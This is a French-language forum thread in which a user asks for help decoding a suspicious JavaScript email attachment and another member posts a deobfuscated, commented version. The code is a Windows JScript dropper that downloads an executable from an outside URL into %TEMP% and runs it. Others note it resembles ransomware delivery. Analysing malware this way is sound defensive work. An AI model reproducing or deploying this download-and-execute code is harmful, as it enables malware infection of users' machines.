Du JS dégueu incompréhensible

alius · Le 17/03/2016, à 22:46

Salut, tout le monde,

je sais pas trop si c'est bien de poster ce genre de truc sur le forum, on verra bien ce qu'en disent les modo

pour tout vous dire, j'aimerai déchiffrer du JS malicieux.

en fait, il s'est passé un truc étrange sur la boite mail de mon amie,
elle a découvert un mail envoyé par elle même dans sa boite de réception. Bien évidemment elle ne s'est jamais envoyé ce mail.
il contenait une pièce jointe qui une fois dézippée contenait un autre zip qui contenait un .js !!! comme par hasard...
Etant curieux j'ai pas pu m’empêcher d'y jeter un œil... seulement j'y connais pas grand chose en JS alors je me demandais si quelqu'un de plus avisé pouvais m'éclairer sur les penchants malicieux qu'il contient.

le code est sur un pastebin

thank !

louis94 · Le 18/03/2016, à 00:04

Bonjour,

On peut décoder sans trop de difficultés :

// C'est du code fait pour Windows. Le plugin ActiveX "WScript.Shell" permet d'exécuter des commandes.
var wscript = new ActiveXObject("WScript.Shell");
// Il s'apprête à charger quelque chose depuis le Web
var requete = new ActiveXObject("MSXML2.XMLHTTP");
// Un nom de fichier dans un dossier temporaire
var nom_de_fichier = wscript.ExpandEnvironmentStrings("%TEMP%") + "/qwRojzl.exe";
// C'est la fonction qui sera exécutée quand on aura chargé quelque chose.
requete.onreadystatechange = function() {
  // Si on a pu charger quelque chose
  if (requete.readystate === 4) {
    // On crée un objet qui peut lire ou écrire des fichiers
    var out = new ActiveXObject("ADODB.Stream");
    out.open();
    out.type = 1;
    // On écrit ce qu'on a téléchargé dans le fichier
    out.write(requete.ResponseBody);
    out.position = 0;
    // On sauve
    out.saveToFile(nom_de_fichier);
    out.close();
  }
};
requete.open("http://whatskv.com/v4v5g45hg.exe");
// On va charger le fichier
requete.send();
// Envoyer la requête
wscript.Run(nom_de_fichier, 1, false);
// Lancer le fichier

En bref, c'est du code qui télécharge un fichier et l'exécute.

Louis

Dernière modification par louis94 (Le 18/03/2016, à 00:05)

Nasman · Le 18/03/2016, à 08:12

C'est le mode d'emploi des rançongiciels

louis94 · Le 18/03/2016, à 18:40

Nasman a écrit :

C'est le mode d'emploi des rançongiciels

Pas forcément : il faut encore que le code fonctionne. Pour ça, il faut soit exploiter une faille (ce qui n'est pas fait, à mon avis, dans le code), soit qu'il soit exécuté en-dehors du navigateur (ce qui est plutôt rare). En fait, je doute que ce code arrive encore à quelque chose dans IE ou Outlook.

Louis

alius · Le 18/03/2016, à 20:11

Ok merci pour ton aide en tout cas.
Cela dit oui il faut vraiment que l'utilisateur exécute le code pour que cela puisse marcher, mine de rien beaucoup de problème sont aujourd'hui réglé sous Windows, sauf le principal problème bien sur, Windows lui même ?

louis94 · Le 18/03/2016, à 20:33

alius a écrit :

Cela dit oui il faut vraiment que l'utilisateur exécute le code pour que cela puisse marcher, mine de rien beaucoup de problème sont aujourd'hui réglé sous Windows, sauf le principal problème bien sur, Windows lui même ?

Je n'ai pas la compétence pour le dire. J'imagine que oui, mais c'est juste une supposition. Il est clair qu'il reste des failles, mais les plus grosses sont sans doute fermées.

Louis

Ubuntu-fr

Navigation

Liens de recherche

Annonce

#1 Le 17/03/2016, à 22:46

Du JS dégueu incompréhensible

#2 Le 18/03/2016, à 00:04

Re : Du JS dégueu incompréhensible

#3 Le 18/03/2016, à 08:12

Re : Du JS dégueu incompréhensible

#4 Le 18/03/2016, à 18:40

Re : Du JS dégueu incompréhensible

#5 Le 18/03/2016, à 20:11

Re : Du JS dégueu incompréhensible

#6 Le 18/03/2016, à 20:33

Re : Du JS dégueu incompréhensible

Pied de page des forums